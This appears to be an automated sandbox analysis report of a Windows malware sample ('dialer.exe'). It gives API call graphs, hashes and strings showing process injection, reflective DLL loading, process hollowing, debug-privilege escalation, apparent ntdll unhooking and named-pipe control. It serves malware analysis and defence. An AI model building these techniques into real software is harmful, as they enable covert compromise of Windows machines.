                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                            • String ID: csm
                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                            • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                            • Instruction ID: 970dcdc0fb841157f279fdd2b98f9c68b6b97f8f16b6d1061b374df43ce87f51
                                                                                                                            • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                            • Instruction Fuzzy Hash: F5112832214B80A2EB618B15F544399B7E5FB89B94F589222EE8D07B68DF3CC551CB00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __std_exception_copy
                                                                                                                            • String ID: ierarchy Descriptor'$riptor at (
                                                                                                                            • API String ID: 592178966-758928094
                                                                                                                            • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                            • Instruction ID: abd3bf4106f5a7a562ffae9154c2c9125541fd19b6c4fc251438606705749a9f
                                                                                                                            • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                            • Instruction Fuzzy Hash: EAE04F61650B48B0DB068F61E9402D833A4AB99B64B589222995C06351FA3CD2E9C710
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __std_exception_copy
                                                                                                                            • String ID: Locator'$riptor at (
                                                                                                                            • API String ID: 592178966-4215709766
                                                                                                                            • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                            • Instruction ID: 46d9ac7343645900364f08d48bc95dd5ebf90c6fa4b19dce8705857ad6f7dbc0
                                                                                                                            • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                            • Instruction Fuzzy Hash: D3E08671611B48B0DF018F61E5402D87374F799B54F98D223CD4C06351EA3CD1E5C710
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 756756679-0
                                                                                                                            • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                            • Instruction ID: 396fbf0c2559966fce4b96abf945cfd2a0a49c48072811e974041a9544b49dcb
                                                                                                                            • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                            • Instruction Fuzzy Hash: EA112B35601B44A1EA549BA6A6043A977B1FBCAFC0F1842269E4D57775DF78C5428B00
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1617791916-0
                                                                                                                            • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                            • Instruction ID: e66ab5fa3e644c395c7e155f16e0a52e394f691d87573ec4fabe612ead34abe9
                                                                                                                            • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                            • Instruction Fuzzy Hash: 58E06D35601604A6EB048FA2E90838A36F1FBCAF46F08C125C90907371DF7DC499CB50

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:49.5%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:226
                                                                                                                            Total number of Limit Nodes:23
                                                                                                                            execution_graph 384 7ff642952b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 385 7ff642952b8e K32EnumProcesses 384->385 386 7ff642952beb SleepEx 385->386 387 7ff642952ba3 385->387 386->385 387->386 389 7ff642952540 387->389 390 7ff64295254d 389->390 391 7ff642952558 389->391 393 7ff6429510c0 390->393 391->387 431 7ff6429518ac OpenProcess 393->431 396 7ff6429514ba 396->391 397 7ff642951122 OpenProcess 397->396 398 7ff64295113e OpenProcess 397->398 399 7ff6429511fd NtQueryInformationProcess 398->399 400 7ff642951161 K32GetModuleFileNameExW 398->400 401 7ff642951224 399->401 402 7ff6429514b1 CloseHandle 399->402 403 7ff6429511aa CloseHandle 400->403 404 7ff64295117a PathFindFileNameW lstrlenW 400->404 401->402 405 7ff642951230 OpenProcessToken 401->405 402->396 403->399 407 7ff6429511b8 403->407 404->403 406 7ff642951197 StrCpyW 404->406 405->402 408 7ff64295124e GetTokenInformation 405->408 406->403 407->399 409 7ff6429511d8 StrCmpIW 407->409 410 7ff642951276 GetLastError 408->410 411 7ff6429512f1 408->411 409->402 409->407 410->411 412 7ff642951281 LocalAlloc 410->412 413 7ff6429512f8 CloseHandle 411->413 412->411 414 7ff642951297 GetTokenInformation 412->414 413->402 418 7ff64295130c 413->418 415 7ff6429512df 414->415 416 7ff6429512bf GetSidSubAuthorityCount GetSidSubAuthority 414->416 417 7ff6429512e6 LocalFree 415->417 416->417 417->413 418->402 419 7ff64295139b StrStrA 418->419 420 7ff6429513c3 418->420 419->418 421 7ff6429513c8 419->421 420->402 421->402 422 7ff6429513f3 VirtualAllocEx 421->422 422->402 423 7ff642951420 WriteProcessMemory 422->423 423->402 424 7ff64295143b 423->424 436 7ff64295211c 424->436 426 7ff64295145b 426->402 427 7ff642951478 WaitForSingleObject 426->427 430 7ff642951471 CloseHandle 426->430 429 7ff642951487 GetExitCodeThread 427->429 427->430 429->430 430->402 432 7ff6429518d8 IsWow64Process 431->432 433 7ff64295110e 431->433 434 7ff6429518ea 432->434 435 7ff6429518f8 CloseHandle 432->435 433->396 433->397 434->435 435->433 439 7ff642951914 GetModuleHandleA 436->439 440 7ff64295193d 439->440 441 7ff642951934 GetProcAddress 439->441 441->440 442 7ff642952bf8 443 7ff642952c05 442->443 445 7ff642952c1a Sleep 443->445 446 7ff642952c25 ConnectNamedPipe 443->446 453 7ff642951b54 AllocateAndInitializeSid 443->453 445->443 447 7ff642952c83 Sleep 446->447 448 7ff642952c34 ReadFile 446->448 450 7ff642952c8e DisconnectNamedPipe 447->450 449 7ff642952c57 448->449 448->450 460 7ff642952524 449->460 450->446 454 7ff642951c6f 453->454 455 7ff642951bb1 SetEntriesInAclW 453->455 454->443 455->454 456 7ff642951bf5 LocalAlloc 455->456 456->454 457 7ff642951c09 InitializeSecurityDescriptor 456->457 457->454 458 7ff642951c19 SetSecurityDescriptorDacl 457->458 458->454 459 7ff642951c30 CreateNamedPipeW 458->459 459->454 461 7ff642952539 WriteFile 460->461 462 7ff642952531 460->462 461->450 463 7ff6429510c0 30 API calls 462->463 463->461 464 7ff642952258 467 7ff64295226c 464->467 491 7ff642951f2c 467->491 470 7ff642951f2c 14 API calls 471 7ff64295228f GetCurrentProcessId OpenProcess 470->471 472 7ff6429522af OpenProcessToken 471->472 473 7ff642952321 FindResourceExA 471->473 476 7ff642952318 CloseHandle 472->476 477 7ff6429522c3 LookupPrivilegeValueW 472->477 474 7ff642952261 ExitProcess 473->474 475 7ff642952341 SizeofResource 473->475 475->474 479 7ff64295235a LoadResource 475->479 476->473 477->476 478 7ff6429522da AdjustTokenPrivileges 477->478 478->476 480 7ff642952312 GetLastError 478->480 479->474 481 7ff64295236e LockResource GetCurrentProcessId 479->481 480->476 505 7ff6429517ec GetProcessHeap HeapAlloc 481->505 483 7ff64295238b RegCreateKeyExW 484 7ff6429523cc ConvertStringSecurityDescriptorToSecurityDescriptorW 483->484 485 7ff642952489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 483->485 486 7ff6429523f4 RegSetKeySecurity LocalFree 484->486 487 7ff64295240e RegCreateKeyExW 484->487 488 7ff64295250f SleepEx 485->488 486->487 489 7ff642952448 GetCurrentProcessId RegSetValueExW RegCloseKey 487->489 490 7ff64295247f RegCloseKey 487->490 488->488 489->490 490->485 492 7ff642951f35 StrCpyW StrCatW GetModuleHandleW 491->492 494 7ff6429520ff 491->494 493 7ff642951f86 GetCurrentProcess K32GetModuleInformation 492->493 492->494 495 7ff6429520f6 FreeLibrary 493->495 496 7ff642951fb6 CreateFileW 493->496 494->470 495->494 496->495 497 7ff642951feb CreateFileMappingW 496->497 498 7ff6429520ed CloseHandle 497->498 499 7ff642952014 MapViewOfFile 497->499 498->495 500 7ff642952037 499->500 501 7ff6429520e4 CloseHandle 499->501 500->501 502 7ff642952050 lstrcmpiA 500->502 504 7ff64295208e 500->504 501->498 502->500 503 7ff642952090 VirtualProtect VirtualProtect 502->503 503->501 504->501 511 7ff6429514d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 505->511 507 7ff642951885 GetProcessHeap HeapFree 508 7ff642951830 508->507 509 7ff642951851 OpenProcess 508->509 509->508 510 7ff642951867 TerminateProcess CloseHandle 509->510 510->508 512 7ff64295162f GetProcessHeap HeapFree GetProcessHeap HeapFree 511->512 517 7ff642951565 511->517 512->508 513 7ff64295157a OpenProcess 514 7ff642951597 K32EnumProcessModules 513->514 513->517 515 7ff64295161a CloseHandle 514->515 514->517 515->517 516 7ff6429515c9 ReadProcessMemory 516->517 517->512 517->513 517->515 517->516 518 7ff6429521d0 520 7ff6429521dd 518->520 519 7ff642951b54 6 API calls 519->520 520->519 521 7ff6429521fd ConnectNamedPipe 520->521 522 7ff6429521f2 Sleep 520->522 523 7ff64295220c ReadFile 521->523 524 7ff642952241 Sleep 521->524 522->520 525 7ff64295224c DisconnectNamedPipe 523->525 526 7ff64295222f 523->526 524->525 525->521 526->525 527 7ff642952560 528 7ff64295273a 527->528 529 7ff642952592 527->529 532 7ff642952748 528->532 533 7ff64295297e ReadFile 528->533 530 7ff6429526c6 GetProcessHeap HeapAlloc K32EnumProcesses 529->530 531 7ff642952598 529->531 534 7ff642952633 530->534 535 7ff642952704 530->535 536 7ff6429526bd ExitProcess 531->536 537 7ff6429525a5 531->537 538 7ff642952974 532->538 539 7ff642952751 532->539 533->534 540 7ff6429529a8 533->540 535->534 548 7ff6429510c0 30 API calls 535->548 541 7ff6429525ae 537->541 542 7ff642952660 RegOpenKeyExW 537->542 543 7ff64295175c 22 API calls 538->543 544 7ff64295275c 539->544 545 7ff642952919 539->545 540->534 546 7ff6429518ac 3 API calls 540->546 541->534 559 7ff6429525cb ReadFile 541->559 549 7ff64295268d RegDeleteValueW 542->549 550 7ff6429526a1 542->550 543->534 551 7ff64295279d 544->551 552 7ff642952761 544->552 547 7ff642951944 ReadFile 545->547 553 7ff6429529c7 546->553 555 7ff642952928 547->555 548->535 549->550 596 7ff6429519c4 SysAllocString SysAllocString CoInitializeEx 550->596 612 7ff642951944 551->612 552->534 609 7ff64295217c 552->609 553->534 562 7ff6429529db GetProcessHeap HeapAlloc 553->562 563 7ff642952638 553->563 555->534 565 7ff642951944 ReadFile 555->565 558 7ff6429526a6 604 7ff64295175c GetProcessHeap HeapAlloc 558->604 559->534 567 7ff6429525f5 559->567 569 7ff6429514d8 13 API calls 562->569 574 7ff642952a90 4 API calls 563->574 564 7ff6429527b4 ReadFile 564->534 570 7ff6429527dc 564->570 571 7ff64295293f 565->571 567->534 578 7ff6429518ac 3 API calls 567->578 587 7ff642952a14 569->587 570->534 575 7ff6429527e9 GetProcessHeap HeapAlloc ReadFile 570->575 571->534 576 7ff642952947 ShellExecuteW 571->576 574->534 580 7ff64295290b GetProcessHeap 575->580 581 7ff64295282d 575->581 576->534 583 7ff642952614 578->583 579 7ff642952a49 GetProcessHeap 585 7ff642952a52 HeapFree 579->585 580->585 581->580 589 7ff642952881 lstrlenW GetProcessHeap HeapAlloc 581->589 592 7ff64295285e 581->592 583->534 583->563 586 7ff642952624 583->586 585->534 588 7ff6429510c0 30 API calls 586->588 587->579 636 7ff6429516cc 587->636 588->534 630 7ff642952a90 CreateFileW 589->630 592->580 616 7ff642951c88 592->616 597 7ff642951b2c SysFreeString SysFreeString 596->597 598 7ff642951a11 CoInitializeSecurity 596->598 597->558 599 7ff642951a4d 598->599 600 7ff642951a59 CoCreateInstance 598->600 599->600 601 7ff642951b26 CoUninitialize 599->601 600->601 602 7ff642951a88 VariantInit 600->602 601->597 603 7ff642951ade 602->603 603->601 605 7ff6429514d8 13 API calls 604->605 607 7ff64295179a 605->607 606 7ff6429517c8 GetProcessHeap HeapFree 607->606 608 7ff6429516cc 5 API calls 607->608 608->607 610 7ff642951914 2 API calls 609->610 611 7ff642952191 610->611 613 7ff642951968 ReadFile 612->613 614 7ff64295198b 613->614 615 7ff6429519a5 613->615 614->613 614->615 615->534 615->564 626 7ff642951cbb 616->626 617 7ff642951cce CreateProcessW 618 7ff642951d2b VirtualAllocEx 617->618 617->626 620 7ff642951d60 WriteProcessMemory 618->620 618->626 619 7ff642951e97 619->580 620->626 621 7ff642951e62 OpenProcess 622 7ff642951e78 TerminateProcess 621->622 621->626 622->626 623 7ff642951dd2 VirtualAlloc 625 7ff642951df1 GetThreadContext 623->625 623->626 624 7ff642951d8c WriteProcessMemory 624->626 625->626 627 7ff642951e09 WriteProcessMemory 625->627 626->617 626->619 626->621 626->623 626->624 627->626 628 7ff642951e30 SetThreadContext 627->628 628->626 629 7ff642951e4e ResumeThread 628->629 629->619 629->626 631 7ff642952ada WriteFile 630->631 632 7ff6429528f7 GetProcessHeap HeapFree 630->632 633 7ff642952b1c CloseHandle 631->633 634 7ff642952afe 631->634 632->580 633->632 634->633 635 7ff642952b02 WriteFile 634->635 635->633 637 7ff6429516eb OpenProcess 636->637 638 7ff642951745 636->638 637->638 639 7ff642951703 637->639 638->579 640 7ff64295211c 2 API calls 639->640 641 7ff642951723 640->641 642 7ff64295173c CloseHandle 641->642 643 7ff642951731 CloseHandle 641->643 642->638 643->642

                                                                                                                            Callgraph

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true
                                                                                                                            • Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                                                                            • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                                                                            • API String ID: 4177739653-1130149537
                                                                                                                            • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                                                            • Instruction ID: b0b2ef005cc9cebdf82d94ef1335c7855a5ff058f79ce7e09bc5b897fb94b059
                                                                                                                            • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                                                            • Instruction Fuzzy Hash: A0811B32B0CB4296E724BF32E8541A9B3A0FF8875EBA44135D94DC2A65DF7ED184C704

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 24 7ff6429510c0-7ff642951110 call 7ff6429518ac 27 7ff6429514ba-7ff6429514d6 24->27 28 7ff642951116-7ff64295111c 24->28 28->27 29 7ff642951122-7ff642951138 OpenProcess 28->29 29->27 30 7ff64295113e-7ff64295115b OpenProcess 29->30 31 7ff6429511fd-7ff64295121e NtQueryInformationProcess 30->31 32 7ff642951161-7ff642951178 K32GetModuleFileNameExW 30->32 33 7ff642951224-7ff64295122a 31->33 34 7ff6429514b1-7ff6429514b4 CloseHandle 31->34 35 7ff6429511aa-7ff6429511b6 CloseHandle 32->35 36 7ff64295117a-7ff642951195 PathFindFileNameW lstrlenW 32->36 33->34 37 7ff642951230-7ff642951248 OpenProcessToken 33->37 34->27 35->31 39 7ff6429511b8-7ff6429511d3 35->39 36->35 38 7ff642951197-7ff6429511a7 StrCpyW 36->38 37->34 40 7ff64295124e-7ff642951274 GetTokenInformation 37->40 38->35 41 7ff6429511d8-7ff6429511ea StrCmpIW 39->41 42 7ff642951276-7ff64295127f GetLastError 40->42 43 7ff6429512f1 40->43 41->34 44 7ff6429511f0-7ff6429511fb 41->44 42->43 45 7ff642951281-7ff642951295 LocalAlloc 42->45 46 7ff6429512f8-7ff642951306 CloseHandle 43->46 44->31 44->41 45->43 47 7ff642951297-7ff6429512bd GetTokenInformation 45->47 46->34 48 7ff64295130c-7ff642951313 46->48 49 7ff6429512df 47->49 50 7ff6429512bf-7ff6429512dd GetSidSubAuthorityCount GetSidSubAuthority 47->50 48->34 51 7ff642951319-7ff642951324 48->51 52 7ff6429512e6-7ff6429512ef LocalFree 49->52 50->52 51->34 53 7ff64295132a-7ff642951334 51->53 52->46 53->34 54 7ff64295133a-7ff642951344 53->54 54->34 55 7ff64295134a-7ff64295138a call 7ff642951ec4 * 3 54->55 55->34 62 7ff642951390-7ff6429513b0 call 7ff642951ec4 StrStrA 55->62 65 7ff6429513c8-7ff6429513ed call 7ff642951ec4 * 2 62->65 66 7ff6429513b2-7ff6429513c1 62->66 65->34 72 7ff6429513f3-7ff64295141a VirtualAllocEx 65->72 66->62 67 7ff6429513c3 66->67 67->34 72->34 73 7ff642951420-7ff642951439 WriteProcessMemory 72->73 73->34 74 7ff64295143b-7ff64295145d call 7ff64295211c 73->74 74->34 77 7ff64295145f-7ff642951467 74->77 77->34 78 7ff642951469-7ff64295146f 77->78 79 7ff642951478-7ff642951485 WaitForSingleObject 78->79 80 7ff642951471-7ff642951476 78->80 82 7ff6429514a6 79->82 83 7ff642951487-7ff64295149b GetExitCodeThread 79->83 81 7ff6429514ab CloseHandle 80->81 81->34 82->81 83->82 84 7ff64295149d-7ff6429514a3 83->84 84->82
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true
                                                                                                                            • Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                                                                            • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                                                                            • API String ID: 2561231171-3753927220
                                                                                                                            • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                                                                            • Instruction ID: e6d825a8506f8645c3b29059d977ce466bfb8ea1e2aec5093385c139a01b2bc7
                                                                                                                            • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                                                                            • Instruction Fuzzy Hash: 93B14D22B0C68286EB24BF23A84027967A5FF44B8EF604135DA0DC7756DFBEE585C740

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true
                                                                                                                            • Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4084875642-0
                                                                                                                            • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                                                                            • Instruction ID: 7927f1c0386f631b24a274f182f4c2640419eaf4c6751e11eb4c812b24c033e3
                                                                                                                            • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                                                                            • Instruction Fuzzy Hash: 6E51BD33B096828AEB25BF23A8546A963A0FB49B8EF544034DA49C7755DF7DE485C600

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true
                                                                                                                            • Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                                                            • String ID: .text$C:\Windows\System32\
                                                                                                                            • API String ID: 2721474350-832442975
                                                                                                                            • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                                                            • Instruction ID: e97b2306410af28f8f3ffcb6e793257af9b99190e07d510a79aa4c3f0f7ac14f
                                                                                                                            • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                                                            • Instruction Fuzzy Hash: 4A51C122B0D68182EB14AF22E45426AB361FF84B9AF544131DE4E83B59DF7EE488C700

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true
                                                                                                                            • Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                                                            • String ID: M$\\.\pipe\dialerchildproc64
                                                                                                                            • API String ID: 2203880229-3489460547
                                                                                                                            • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                                                                            • Instruction ID: ead008b3cd00237fe7ca8265c32e8e15cee4b2c7c6f6efa7763a3be908f2a472
                                                                                                                            • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                                                                            • Instruction Fuzzy Hash: 8C117323B0C64692E718FB22E804379A760AF857AAF644235D55EC26D6DFBDE488C704

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true
                                                                                                                            • Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                                                            • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                                                            • API String ID: 2071455217-3440882674
                                                                                                                            • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                                                                            • Instruction ID: 1131d8b01f42ac3cde193b3eebc822b599b59e9cafa000d3e7c551c751869c5e
                                                                                                                            • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                                                                            • Instruction Fuzzy Hash: C8014433F0C64292E618BB23A404275A360AF417EAF644234DA2EC25E6DFBEE484C704

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true
                                                                                                                            • Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3197395349-0
                                                                                                                            • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                                                                            • Instruction ID: 40fa87f86c4e3c725976a0eca27fb26d5a4fe47c703b3521620a75e08bd097f3
                                                                                                                            • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                                                                            • Instruction Fuzzy Hash: 7F318D33A187528AD720EF25E48079E77A5FB4879CF50022AEB4D83A98DF7DD148CB44

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true
                                                                                                                            • Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
